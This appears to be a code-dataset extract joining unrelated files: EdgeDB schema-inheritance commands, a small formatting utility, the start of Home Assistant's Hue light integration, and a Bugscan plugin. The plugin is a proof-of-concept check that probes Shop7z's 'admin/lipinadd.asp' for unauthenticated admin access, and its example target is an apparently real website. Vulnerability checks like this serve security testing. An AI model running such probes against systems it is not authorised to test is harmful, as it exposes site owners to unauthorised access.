astnode, context) parent_ctx = cls.get_referrer_context(context) if parent_ctx is not None: assert isinstance(parent_ctx.op, sd.QualifiedObjectCommand) referrer_name = parent_ctx.op.classname base_name: str try: base_ref = utils.ast_to_object( astnode.name, modaliases=context.modaliases, schema=schema, ) except errors.InvalidReferenceError: base_name = sn.Name(name) else: base_name = base_ref.get_name(schema) quals = cls._classname_quals_from_ast( schema, astnode, base_name, referrer_name, context) pnn = sn.get_specialized_name(base_name, referrer_name, *quals) name = sn.Name(name=pnn, module=referrer_name.module) assert isinstance(name, sn.Name) return name @classmethod def _classname_from_name( cls, name: sn.SchemaName, referrer_name: sn.SchemaName, ) -> sn.Name: base_name = sn.shortname_from_fullname(name) quals = cls._classname_quals_from_name(name) pnn = sn.get_specialized_name(base_name, referrer_name, *quals) return sn.Name(name=pnn, module=referrer_name.module) @classmethod def _classname_quals_from_ast( cls, schema: s_schema.Schema, astnode: qlast.NamedDDL, base_name: str, referrer_name: str, context: sd.CommandContext, ) -> Tuple[str, ...]: return () @classmethod def _classname_quals_from_name( cls, name: sn.SchemaName, ) -> Tuple[str, ...]: return () @classmethod def _name_qual_from_exprs(cls, schema: s_schema.Schema, exprs: Iterable[str]) -> str: m = hashlib.sha1() for expr in exprs: m.update(expr.encode()) return m.hexdigest() def _get_ast_node(self, schema: s_schema.Schema, context: sd.CommandContext ) -> Type[qlast.DDLOperation]: subject_ctx = self.get_referrer_context(context) ref_astnode: Type[qlast.DDLOperation] = getattr(self, 'referenced_astnode', None) if subject_ctx is not None and ref_astnode is not None: return ref_astnode else: if isinstance(self.astnode, (list, tuple)): return self.astnode[1] else: return self.astnode def _build_alter_cmd_stack( self, schema: s_schema.Schema, context: sd.CommandContext, scls: so.Object, *, referrer: Optional[so.Object] = None ) -> Tuple[sd.DeltaRoot, sd.Command]: delta = sd.DeltaRoot() if referrer is None: assert isinstance(scls, ReferencedObject) referrer = scls.get_referrer(schema) obj = referrer object_stack = [] if type(self) != type(referrer): object_stack.append(referrer) while obj is not None: if isinstance(obj, ReferencedObject): obj = obj.get_referrer(schema) object_stack.append(obj) else: obj = None cmd: sd.Command = delta for obj in reversed(object_stack): assert obj is not None alter_cmd_cls = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, type(obj)) alter_cmd = alter_cmd_cls(classname=obj.get_name(schema)) cmd.add(alter_cmd) cmd = alter_cmd return delta, cmd class CreateReferencedObject( ReferencedObjectCommand[ReferencedT], sd.CreateObject[ReferencedT], ): referenced_astnode: ClassVar[Type[qlast.ObjectDDL]] @classmethod def _cmd_tree_from_ast( cls, schema: s_schema.Schema, astnode: qlast.DDLOperation, context: sd.CommandContext, ) -> sd.Command: cmd = super()._cmd_tree_from_ast(schema, astnode, context) if isinstance(astnode, cls.referenced_astnode): objcls = cls.get_schema_metaclass() referrer_ctx = cls.get_referrer_context_or_die(context) referrer_class = referrer_ctx.op.get_schema_metaclass() referrer_name = referrer_ctx.op.classname refdict = referrer_class.get_refdict_for_class(objcls) cmd.set_attribute_value( refdict.backref_attr, so.ObjectShell( name=referrer_name, schemaclass=referrer_class, ), ) cmd.set_attribute_value('is_local', True) if getattr(astnode, 'is_abstract', None): cmd.set_attribute_value('is_abstract', True) return cmd def _get_ast_node(self, schema: s_schema.Schema, context: sd.CommandContext ) -> Type[qlast.DDLOperation]: scls = self.get_object(schema, context) assert isinstance(scls, ReferencedInheritingObject) implicit_bases = scls.get_implicit_bases(schema) if implicit_bases and not context.declarative: mcls = self.get_schema_metaclass() Alter = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, mcls) alter = Alter(classname=self.classname) return alter._get_ast_node(schema, context) else: return super()._get_ast_node(schema, context) @classmethod def as_inherited_ref_cmd(cls, schema: s_schema.Schema, context: sd.CommandContext, astnode: qlast.ObjectDDL, parents: Any) -> sd.Command: cmd = cls(classname=cls._classname_from_ast(schema, astnode, context)) cmd.set_attribute_value('name', cmd.classname) return cmd @classmethod def as_inherited_ref_ast(cls, schema: s_schema.Schema, context: sd.CommandContext, name: str, parent: ReferencedObject) -> qlast.ObjectDDL: nref = cls.get_inherited_ref_name(schema, context, parent, name) astnode_cls = cls.referenced_astnode astnode = astnode_cls(name=nref) assert isinstance(astnode, qlast.ObjectDDL) return astnode @classmethod def get_inherited_ref_name(cls, schema: s_schema.Schema, context: sd.CommandContext, parent: ReferencedObject, name: str ) -> qlast.ObjectRef: # reduce name to shortname if sn.Name.is_qualified(name): shortname: str = sn.shortname_from_fullname(sn.Name(name)) else: shortname = name nref = qlast.ObjectRef( name=shortname, module=parent.get_shortname(schema).module, ) return nref def _create_innards( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: referrer_ctx = self.get_referrer_context(context) if referrer_ctx is None: return super()._create_innards(schema, context) else: referrer = referrer_ctx.scls schema = self._create_ref(schema, context, referrer) return super()._create_innards(schema, context) def _create_ref( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.Object, ) -> s_schema.Schema: referrer_cls = type(referrer) mcls = type(self.scls) refdict = referrer_cls.get_refdict_for_class(mcls) schema = referrer.add_classref(schema, refdict.attr, self.scls) return schema class DeleteReferencedObjectCommand( ReferencedObjectCommand[ReferencedT], sd.DeleteObject[ReferencedT], ): def _delete_innards( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: schema = super()._delete_innards(schema, context) referrer_ctx = self.get_referrer_context(context) if referrer_ctx is None: return schema else: referrer = referrer_ctx.scls schema = self._delete_ref(schema, context, referrer) return schema def _delete_ref( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.Object, ) -> s_schema.Schema: scls = self.scls referrer_class = type(referrer) mcls = type(scls) refdict = referrer_class.get_refdict_for_class(mcls) reftype = referrer_class.get_field(refdict.attr).type refname = reftype.get_key_for(schema, self.scls) return referrer.del_classref(schema, refdict.attr, refname) class ReferencedInheritingObjectCommand( ReferencedObjectCommand[ReferencedInheritingObjectT], inheriting.InheritingObjectCommand[ReferencedInheritingObjectT], ): def _get_implicit_ref_bases( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.InheritingObject, referrer_field: str, fq_name: sn.SchemaName, ) -> List[ReferencedInheritingObjectT]: assert isinstance(referrer, so.QualifiedObject) child_referrer_bases = referrer.get_bases(schema).objects(schema) implicit_bases = [] ref_field_type = type(referrer).get_field(referrer_field).type for ref_base in child_referrer_bases: fq_name_in_child = self._classname_from_name( fq_name, ref_base.get_name(schema)) refname = ref_field_type.get_key_for_name(schema, fq_name_in_child) parent_coll = ref_base.get_field_value(schema, referrer_field) parent_item = parent_coll.get(schema, refname, default=None) if (parent_item is not None and not parent_item.get_is_final(schema)): implicit_bases.append(parent_item) return implicit_bases def get_ref_implicit_base_delta( self, schema: s_schema.Schema, context: sd.CommandContext, refcls: ReferencedInheritingObjectT, implicit_bases: List[ReferencedInheritingObjectT], ) -> inheriting.BaseDelta_T: child_bases = refcls.get_bases(schema).objects(schema) default_base = refcls.get_default_base_name() explicit_bases = [ b for b in child_bases if b.generic(schema) and b.get_name(schema) != default_base ] new_bases = implicit_bases + explicit_bases return inheriting.delta_bases( [b.get_name(schema) for b in child_bases], [b.get_name(schema) for b in new_bases], ) def _validate( self, schema: s_schema.Schema, context: sd.CommandContext ) -> None: scls = self.scls implicit_bases = [ b for b in scls.get_bases(schema).objects(schema) if not b.generic(schema) ] referrer_ctx = self.get_referrer_context_or_die(context) objcls = self.get_schema_metaclass() referrer_class = referrer_ctx.op.get_schema_metaclass() refdict = referrer_class.get_refdict_for_class(objcls) if context.declarative and scls.get_is_local(schema): if (implicit_bases and refdict.requires_explicit_overloaded and not self.get_attribute_value('declared_overloaded')): ancestry = [] for obj in implicit_bases: bref = obj.get_referrer(schema) assert bref is not None ancestry.append(bref) raise errors.SchemaDefinitionError( f'{self.scls.get_verbosename(schema, with_parent=True)} ' f'must be declared using the `overloaded` keyword because ' f'it is defined in the following ancestor(s): ' f'{", ".join(a.get_shortname(schema) for a in ancestry)}', context=self.source_context, ) elif (not implicit_bases and self.get_attribute_value('declared_overloaded')): raise errors.SchemaDefinitionError( f'{self.scls.get_verbosename(schema, with_parent=True)}: ' f'cannot be declared `overloaded` as there are no ' f'ancestors defining it.', context=self.source_context, ) def _propagate_ref_op(self, schema: s_schema.Schema, context: sd.CommandContext, scls: ReferencedInheritingObject, cb: Callable[[sd.Command, str], None] ) -> s_schema.Schema: rec = context.current().enable_recursion context.current().enable_recursion = False referrer_ctx = self.get_referrer_context_or_die(context) referrer = referrer_ctx.scls referrer_class = type(referrer) mcls = type(scls) refdict = referrer_class.get_refdict_for_class(mcls) reftype = referrer_class.get_field(refdict.attr).type refname = reftype.get_key_for(schema, self.scls) r_alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, referrer_class) alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, mcls) for descendant in scls.ordered_descendants(schema): d_name = descendant.get_name(schema) assert isinstance(descendant, ReferencedObject) d_referrer = descendant.get_referrer(schema) assert d_referrer is not None d_alter_cmd = alter_cmdcls(classname=d_name) r_alter_cmd = r_alter_cmdcls( classname=d_referrer.get_name(schema)) with r_alter_cmd.new_context(schema, context, d_referrer): with d_alter_cmd.new_context(schema, context, descendant): cb(d_alter_cmd, refname) r_alter_cmd.add(d_alter_cmd) schema = r_alter_cmd.apply(schema, context) self.add(r_alter_cmd) context.current().enable_recursion = rec return schema class CreateReferencedInheritingObject( CreateReferencedObject[ReferencedInheritingObjectT], inheriting.CreateInheritingObject[ReferencedInheritingObjectT], ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], ): def _get_ast( self, schema: s_schema.Schema, context: sd.CommandContext, *, parent_node: Optional[qlast.DDLOperation] = None, ) -> Optional[qlast.DDLOperation]: refctx = type(self).get_referrer_context(context) if refctx is not None: if not self.get_attribute_value('is_local'): if context.descriptive_mode: astnode = super()._get_ast( schema, context, parent_node=parent_node, ) assert astnode is not None inherited_from = [ sn.quals_from_fullname(b)[0] for b in self.get_implicit_bases( schema, context, self.get_attribute_value('bases'), ) ] astnode.system_comment = ( f'inherited from {", ".join(inherited_from)}' ) return astnode else: return None else: astnode = super()._get_ast( schema, context, parent_node=parent_node) if context.declarative: scls = self.get_object(schema, context) assert isinstance(scls, ReferencedInheritingObject) implicit_bases = scls.get_implicit_bases(schema) objcls = self.get_schema_metaclass() referrer_class = refctx.op.get_schema_metaclass() refdict = referrer_class.get_refdict_for_class(objcls) if refdict.requires_explicit_overloaded and implicit_bases: assert astnode is not None astnode.declared_overloaded = True return astnode else: return super()._get_ast(schema, context, parent_node=parent_node) def _create_begin( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: referrer_ctx = self.get_referrer_context(context) implicit_bases = None if referrer_ctx is not None and not context.canonical: objcls = self.get_schema_metaclass() referrer = referrer_ctx.scls if isinstance(referrer, so.InheritingObject): referrer_class = referrer_ctx.op.get_schema_metaclass() refdict = referrer_class.get_refdict_for_class(objcls) implicit_bases = self._get_implicit_ref_bases( schema, context, referrer, refdict.attr, self.classname) if implicit_bases: bases = self.get_attribute_value('bases') if bases: bases = so.ObjectList.create( schema, implicit_bases + [ b for b in bases.objects(schema) if b not in implicit_bases ], ) else: bases = so.ObjectList.create( schema, implicit_bases, ) self.set_attribute_value('bases', bases) schema = super()._create_begin(schema, context) if referrer_ctx is not None and not context.canonical: self._validate(schema, context) return schema def _create_ref( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.Object, ) -> s_schema.Schema: schema = super()._create_ref(schema, context, referrer) if (not self.scls.get_is_final(schema) and isinstance(referrer, so.InheritingObject) and not context.canonical and context.enable_recursion): # Propagate the creation of a new ref to descendants of # our referrer. schema = self._propagate_ref_creation(schema, context, referrer) return schema def _propagate_ref_creation( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.InheritingObject, ) -> s_schema.Schema: get_cmd = sd.ObjectCommandMeta.get_command_class_or_die mcls = type(self.scls) referrer_cls = type(referrer) alter_cmd = get_cmd(sd.AlterObject, referrer_cls) ref_create_cmd = get_cmd(sd.CreateObject, mcls) ref_alter_cmd = get_cmd(sd.AlterObject, mcls) ref_rebase_cmd = get_cmd(inheriting.RebaseInheritingObject, mcls) assert issubclass(ref_create_cmd, CreateReferencedInheritingObject) assert issubclass(ref_rebase_cmd, RebaseReferencedInheritingObject) refdict = referrer_cls.get_refdict_for_class(mcls) parent_fq_refname = self.scls.get_name(schema) for child in referrer.children(schema): if not child.allow_ref_propagation(schema, context, refdict): continue alter = alter_cmd(classname=child.get_name(schema)) with alter.new_context(schema, context, child): # This is needed to get the correct inherited name which will # either be created or rebased. ref_field_type = type(child).get_field(refdict.attr).type refname = ref_field_type.get_key_for_name( schema, parent_fq_refname) astnode = ref_create_cmd.as_inherited_ref_ast( schema, context, refname, self.scls) fq_name = self._classname_from_ast(schema, astnode, context) # We cannot check for ref existence in this child at this # time, because it might get created in a sibling branch # of the delta tree. Instead, generate a command group # containing Alter(if_exists) and Create(if_not_exists) # to postpone that check until the application time. ref_create = ref_create_cmd.as_inherited_ref_cmd( schema, context, astnode, [self.scls]) ref_create.if_not_exists = True ref_create.set_attribute_value(refdict.backref_attr, child) if child.get_is_derived(schema): # All references in a derived object must # also be marked as derived, to be consistent # with derive_subtype(). ref_create.set_attribute_value('is_derived', True) ref_alter = ref_alter_cmd(classname=fq_name, if_exists=True) ref_alter.add(ref_rebase_cmd( classname=fq_name, implicit=True, added_bases=(), removed_bases=(), )) alter.add(ref_alter) alter.add(ref_create) self.add(alter) return schema def get_implicit_bases( self, schema: s_schema.Schema, context: sd.CommandContext, bases: Any, ) -> Sequence[str]: mcls = self.get_schema_metaclass() default_base = mcls.get_default_base_name() if isinstance(bases, so.ObjectCollectionShell): base_names = [ b.name for b in bases.items if b.name is not None ] else: assert isinstance(bases, so.ObjectList) base_names = list(bases.names(schema)) # Filter out explicit bases implicit_bases = [ b for b in base_names if ( b != default_base and isinstance(b, sn.SchemaName) and sn.shortname_from_fullname(b) != b ) ] return implicit_bases class AlterReferencedInheritingObject( ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], inheriting.AlterInheritingObject[ReferencedInheritingObjectT], ): @classmethod def _cmd_tree_from_ast( cls, schema: s_schema.Schema, astnode: qlast.DDLOperation, context: sd.CommandContext, ) -> AlterReferencedInheritingObject[ReferencedInheritingObjectT]: cmd = super()._cmd_tree_from_ast(schema, astnode, context) refctx = cls.get_referrer_context(context) if refctx is not None: cmd.set_attribute_value('is_local', True) assert isinstance(cmd, AlterReferencedInheritingObject) return cmd def _alter_begin( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: scls = self.scls was_local = scls.get_is_local(schema) schema = super()._alter_begin(schema, context) now_local = scls.get_is_local(schema) if not was_local and now_local: self._validate(schema, context) return schema class RebaseReferencedInheritingObject( ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], inheriting.RebaseInheritingObject[ReferencedInheritingObjectT], ): implicit = struct.Field(bool, default=False) def apply( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: if not context.canonical and self.implicit: mcls = self.get_schema_metaclass() refctx = self.get_referrer_context_or_die(context) referrer = refctx.scls assert isinstance(referrer, so.InheritingObject) refdict = type(referrer).get_refdict_for_class(mcls) implicit_bases = self._get_implicit_ref_bases( schema, context, referrer=referrer, referrer_field=refdict.attr, fq_name=self.classname, ) scls = self.get_object(schema, context) removed_bases, added_bases = self.get_ref_implicit_base_delta( schema, context, scls, implicit_bases=implicit_bases, ) self.added_bases = added_bases self.removed_bases = removed_bases return super().apply(schema, context) class RenameReferencedInheritingObject( ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], sd.RenameObject, ): def _rename_begin(self, schema: s_schema.Schema, context: sd.CommandContext ) -> s_schema.Schema: orig_schema = schema schema = super()._rename_begin(schema, context) scls = self.scls if not context.canonical and not scls.generic(schema): implicit_bases = scls.get_implicit_bases(schema) non_renamed_bases = set(implicit_bases) - context.renamed_objs # This object is inherited from one or more ancestors that # are not renamed in the same op, and this is an error. if non_renamed_bases: bases_str = ', '.join( b.get_verbosename(schema, with_parent=True) for b in non_renamed_bases ) verb = 'are' if len(non_renamed_bases) > 1 else 'is' vn = scls.get_verbosename(orig_schema) raise errors.SchemaDefinitionError( f'cannot rename inherited {vn}', details=( f'{vn} is inherited from ' f'{bases_str}, which {verb} not being renamed' ), context=self.source_context, ) if context.enable_recursion: schema = self._propagate_ref_rename(schema, context, scls) else: for op in self.get_subcommands(type=sd.ObjectCommand): schema = op.apply(schema, context) return schema def _propagate_ref_rename(self, schema: s_schema.Schema, context: sd.CommandContext, scls: ReferencedInheritingObject ) -> s_schema.Schema: rename_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.RenameObject, type(scls)) def _ref_rename(alter_cmd: sd.Command, refname: str) -> None: astnode = rename_cmdcls.astnode( new_name=qlast.ObjectRef( name=refname, ), ) rename_cmd = rename_cmdcls._rename_cmd_from_ast( schema, astnode, context) alter_cmd.add(rename_cmd) return self._propagate_ref_op(schema, context, scls, cb=_ref_rename) class DeleteReferencedInheritingObject( DeleteReferencedObjectCommand[ReferencedInheritingObjectT], inheriting.DeleteInheritingObject[ReferencedInheritingObjectT], ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], ): def _delete_ref( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.Object, ) -> s_schema.Schema: scls = self.scls referrer_class = type(referrer) mcls = type(scls) refdict = referrer_class.get_refdict_for_class(mcls) reftype = referrer_class.get_field(refdict.attr).type refname = reftype.get_key_for(schema, self.scls) self_name = self.scls.get_name(schema) schema = referrer.del_classref(schema, refdict.attr, refname) if (isinstance(referrer, so.InheritingObject) and not context.canonical): if (not context.in_deletion(offset=1) and not context.disable_dep_verification): implicit_bases = set(self._get_implicit_ref_bases( schema, context, referrer, refdict.attr, self_name)) deleted_bases = set() for ctx in context.stack: if isinstance(ctx.op, type(self)): deleted_bases.add(ctx.op.scls) implicit_bases -= deleted_bases if implicit_bases: # Cannot remove inherited objects. vn = scls.get_verbosename(schema, with_parent=True) parents = [ b.get_field_value(schema, refdict.backref_attr) for b in implicit_bases ] pnames = '\n- '.join( p.get_verbosename(schema, with_parent=True) for p in parents ) raise errors.SchemaError( f'cannot drop inherited {vn}', context=self.source_context, details=f'{vn} is inherited from:\n- {pnames}' ) alter_cmd = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, referrer_class) for child in referrer.children(schema): assert isinstance(child, so.QualifiedObject) child_coll = child.get_field_value(schema, refdict.attr) fq_refname_in_child = self._classname_from_name( self_name, child.get_name(schema), ) child_refname = reftype.get_key_for_name( schema, fq_refname_in_child) existing = child_coll.get(schema, child_refname, None) if existing is not None: alter = alter_cmd(classname=child.get_name(schema)) with alter.new_context(schema, context, child): schema, cmd = self._propagate_ref_deletion( schema, context, refdict, child, existing) alter.add(cmd) self.add(alter) return schema def _propagate_ref_deletion( self, schema: s_schema.Schema, context: sd.CommandContext, refdict: so.RefDict, child: so.InheritingObject, child_ref: ReferencedInheritingObjectT, ) -> Tuple[s_schema.Schema, sd.Command]: get_cmd = sd.ObjectCommandMeta.get_command_class_or_die mcls = type(self.scls) name = child_ref.get_name(schema) implicit_bases = self._get_implicit_ref_bases( schema, context, child, refdict.attr, name) cmd: sd.Command if child_ref.get_is_local(schema) or implicit_bases: # Child is either defined locally or is inherited # from another parent, so we need to do a rebase. removed_bases, added_bases = self.get_ref_implicit_base_delta( schema, context, child_ref, implicit_bases) rebase_cmd_cls = get_cmd(inheriting.RebaseInheritingObject, mcls) rebase_cmd = rebase_cmd_cls( classname=name, added_bases=added_bases, removed_bases=removed_bases, ) ref_alter_cmd = get_cmd(sd.AlterObject, mcls) cmd = ref_alter_cmd(classname=name) cmd.add(rebase_cmd) else: # The ref in child should no longer exist. ref_del_cmd = get_cmd(sd.DeleteObject, mcls) cmd = ref_del_cmd(classname=name) schema = cmd.apply(schema, context) return schema, cmd
[((34717, 34750), 'edb.common.struct.Field', 'struct.Field', (['bool'], {'default': '(False)'}), '(bool, default=False)\n', (34729, 34750), False, 'from edb.common import struct\n'), ((12110, 12124), 'hashlib.sha1', 'hashlib.sha1', ([], {}), '()\n', (12122, 12124), False, 'import hashlib\n'), ((3477, 3550), 'edb.errors.SchemaError', 'errors.SchemaError', (['f"""cannot derive {self!r}({derived_name}) from itself"""'], {}), "(f'cannot derive {self!r}({derived_name}) from itself')\n", (3495, 3550), False, 'from edb import errors\n'), ((36944, 37122), 'edb.errors.SchemaDefinitionError', 'errors.SchemaDefinitionError', (['f"""cannot rename inherited {vn}"""'], {'details': 'f"""{vn} is inherited from {bases_str}, which {verb} not being renamed"""', 'context': 'self.source_context'}), "(f'cannot rename inherited {vn}', details=\n f'{vn} is inherited from {bases_str}, which {verb} not being renamed',\n context=self.source_context)\n", (36972, 37122), False, 'from edb import errors\n'), ((38084, 38113), 'edb.edgeql.ast.ObjectRef', 'qlast.ObjectRef', ([], {'name': 'refname'}), '(name=refname)\n', (38099, 38113), True, 'from edb.edgeql import ast as qlast\n'), ((40315, 40449), 'edb.errors.SchemaError', 'errors.SchemaError', (['f"""cannot drop inherited {vn}"""'], {'context': 'self.source_context', 'details': 'f"""{vn} is inherited from:\n- {pnames}"""'}), '(f\'cannot drop inherited {vn}\', context=self.\n source_context, details=f"""{vn} is inherited from:\n- {pnames}""")\n', (40333, 40449), False, 'from edb import errors\n')]
Jakuko99/effectb
tools.py
ab6688ce3679cdd2cf43038f7bfef67dabf97c1b
from calendar import month_name class Tools: def __init__(self): self.output = "" def formatDate(self, date): elements = date.split("-") return f"{elements[2]}. {month_name[int(elements[1])]} {elements[0]}" def shortenText(self, string, n): #return first n sentences from string first = string.find(".") for _ in range(n - 1): if not string.find(".", first + 1) == -1: first = string.find(".", first + 1) return f"{string[:first-len(string)]}." def tupleUnpack(self, tup): self.output = "" for item in tup: self.output += f"{item} " return self.output[:-1] def joinList(self, list): self.output = "" for item in list: self.output += f"{item}, " return self.output[:-2] #remove last ', ' def partialJoin(self, list, n): self.output = "" i = 0 for item in list: self.output += f"{item}, " i += 1 if i >= n: break return self.output[:-2] def processFilmography(self, list, n): self.output = "" i = 0 for item in list: if 'year' in item: self.output += f"{item['title']} ({item['year']}), " else: self.output += f"{item['title'].replace(' ()', '')}, " i += 1 if i >= n: break return self.output[:-2] def convertTime(self, runtime): time = int(runtime) mins = time % 60 hours = int(time / 60) if hours >= 1: return f"{hours} h {mins} min" else: return f"{mins} min"
[]
csadsl/poc_exp
Bugscan_exploits-master/exp_list/exp-2307.py
e3146262e7403f19f49ee2db56338fa3f8e119c9
#!/usr/bin/env python # -*- coding: utf-8 -*- #__Author__ = 烽火戏诸侯 #_PlugName_ = Shop7z /admin/lipinadd.asp越权访问 import re def assign(service, arg): if service == "shop7z": return True, arg def audit(arg): payload = 'admin/lipinadd.asp' target = arg + payload code, head,res, errcode, _ = curl.curl2(target) if code == 200 and 'name="lipinname"' in res and 'name="showflag"' in res: security_hole(target) if __name__ == '__main__': from dummy import * audit(assign('shop7z', 'http://www.99ysbjw.com/')[1])
[]
dlangerm/core
homeassistant/components/hue/light.py
643acbf9484fd05161d7e9f2228c9c92a5ce7d0b
"""Support for the Philips Hue lights.""" from __future__ import annotations from datetime import timedelta from functools import partial import logging import random import aiohue import async_timeout from homeassistant.components.light import ( ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_EFFECT, ATTR_FLASH, ATTR_HS_COLOR, ATTR_TRANSITION, EFFECT_COLORLOOP, EFFECT_RANDOM, FLASH_LONG, FLASH_SHORT, SUPPORT_BRIGHTNESS, SUPPORT_COLOR, SUPPORT_COLOR_TEMP, SUPPORT_EFFECT, SUPPORT_FLASH, SUPPORT_TRANSITION, LightEntity, ) from homeassistant.core import callback from homeassistant.exceptions import PlatformNotReady from homeassistant.helpers.debounce import Debouncer from homeassistant.helpers.entity import DeviceInfo from homeassistant.helpers.update_coordinator import ( CoordinatorEntity, DataUpdateCoordinator, UpdateFailed, ) from homeassistant.util import color from .const import ( DOMAIN as HUE_DOMAIN, GROUP_TYPE_LIGHT_GROUP, GROUP_TYPE_LIGHT_SOURCE, GROUP_TYPE_LUMINAIRE, GROUP_TYPE_ROOM, REQUEST_REFRESH_DELAY, ) from .helpers import remove_devices SCAN_INTERVAL = timedelta(seconds=5) _LOGGER = logging.getLogger(__name__) SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR SUPPORT_HUE = { "Extended color light": SUPPORT_HUE_EXTENDED, "Color light": SUPPORT_HUE_COLOR, "Dimmable light": SUPPORT_HUE_DIMMABLE, "On/Off plug-in unit": SUPPORT_HUE_ON_OFF, "Color temperature light": SUPPORT_HUE_COLOR_TEMP, } ATTR_IS_HUE_GROUP = "is_hue_group" GAMUT_TYPE_UNAVAILABLE = "None" # Minimum Hue Bridge API version to support groups # 1.4.0 introduced extended group info # 1.12 introduced the state object for groups # 1.13 introduced "any_on" to group state objects GROUP_MIN_API_VERSION = (1, 13, 0) async def async_setup_platform(hass, config, async_add_entities, discovery_info=None): """Old way of setting up Hue lights. Can only be called when a user accidentally mentions hue platform in their config. But even in that case it would have been ignored. """ def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id): """Create the light.""" api_item = api[item_id] if is_group: supported_features = 0 for light_id in api_item.lights: if light_id not in bridge.api.lights: continue light = bridge.api.lights[light_id] supported_features |= SUPPORT_HUE.get(light.type, SUPPORT_HUE_EXTENDED) supported_features = supported_features or SUPPORT_HUE_EXTENDED else: supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED) return item_class( coordinator, bridge, is_group, api_item, supported_features, rooms ) async def async_setup_entry(hass, config_entry, async_add_entities): """Set up the Hue lights from a config entry.""" bridge = hass.data[HUE_DOMAIN][config_entry.entry_id] api_version = tuple(int(v) for v in bridge.api.config.apiversion.split(".")) rooms = {} allow_groups = bridge.allow_groups supports_groups = api_version >= GROUP_MIN_API_VERSION if allow_groups and not supports_groups: _LOGGER.warning("Please update your Hue bridge to support groups") light_coordinator = DataUpdateCoordinator( hass, _LOGGER, name="light", update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update), update_interval=SCAN_INTERVAL, request_refresh_debouncer=Debouncer( bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True ), ) # First do a refresh to see if we can reach the hub. # Otherwise we will declare not ready. await light_coordinator.async_refresh() if not light_coordinator.last_update_success: raise PlatformNotReady if not supports_groups: update_lights_without_group_support = partial( async_update_items, bridge, bridge.api.lights, {}, async_add_entities, partial(create_light, HueLight, light_coordinator, bridge, False, rooms), None, ) # We add a listener after fetching the data, so manually trigger listener bridge.reset_jobs.append( light_coordinator.async_add_listener(update_lights_without_group_support) ) return group_coordinator = DataUpdateCoordinator( hass, _LOGGER, name="group", update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update), update_interval=SCAN_INTERVAL, request_refresh_debouncer=Debouncer( bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True ), ) if allow_groups: update_groups = partial( async_update_items, bridge, bridge.api.groups, {}, async_add_entities, partial(create_light, HueLight, group_coordinator, bridge, True, None), None, ) bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups)) cancel_update_rooms_listener = None @callback def _async_update_rooms(): """Update rooms.""" nonlocal cancel_update_rooms_listener rooms.clear() for item_id in bridge.api.groups: group = bridge.api.groups[item_id] if group.type != GROUP_TYPE_ROOM: continue for light_id in group.lights: rooms[light_id] = group.name # Once we do a rooms update, we cancel the listener # until the next time lights are added bridge.reset_jobs.remove(cancel_update_rooms_listener) cancel_update_rooms_listener() # pylint: disable=not-callable cancel_update_rooms_listener = None @callback def _setup_rooms_listener(): nonlocal cancel_update_rooms_listener if cancel_update_rooms_listener is not None: # If there are new lights added before _async_update_rooms # is called we should not add another listener return cancel_update_rooms_listener = group_coordinator.async_add_listener( _async_update_rooms ) bridge.reset_jobs.append(cancel_update_rooms_listener) _setup_rooms_listener() await group_coordinator.async_refresh() update_lights_with_group_support = partial( async_update_items, bridge, bridge.api.lights, {}, async_add_entities, partial(create_light, HueLight, light_coordinator, bridge, False, rooms), _setup_rooms_listener, ) # We add a listener after fetching the data, so manually trigger listener bridge.reset_jobs.append( light_coordinator.async_add_listener(update_lights_with_group_support) ) update_lights_with_group_support() async def async_safe_fetch(bridge, fetch_method): """Safely fetch data.""" try: with async_timeout.timeout(4): return await bridge.async_request_call(fetch_method) except aiohue.Unauthorized as err: await bridge.handle_unauthorized_error() raise UpdateFailed("Unauthorized") from err except aiohue.AiohueException as err: raise UpdateFailed(f"Hue error: {err}") from err @callback def async_update_items( bridge, api, current, async_add_entities, create_item, new_items_callback ): """Update items.""" new_items = [] for item_id in api: if item_id in current: continue current[item_id] = create_item(api, item_id) new_items.append(current[item_id]) bridge.hass.async_create_task(remove_devices(bridge, api, current)) if new_items: # This is currently used to setup the listener to update rooms if new_items_callback: new_items_callback() async_add_entities(new_items) def hue_brightness_to_hass(value): """Convert hue brightness 1..254 to hass format 0..255.""" return min(255, round((value / 254) * 255)) def hass_to_hue_brightness(value): """Convert hass brightness 0..255 to hue 1..254 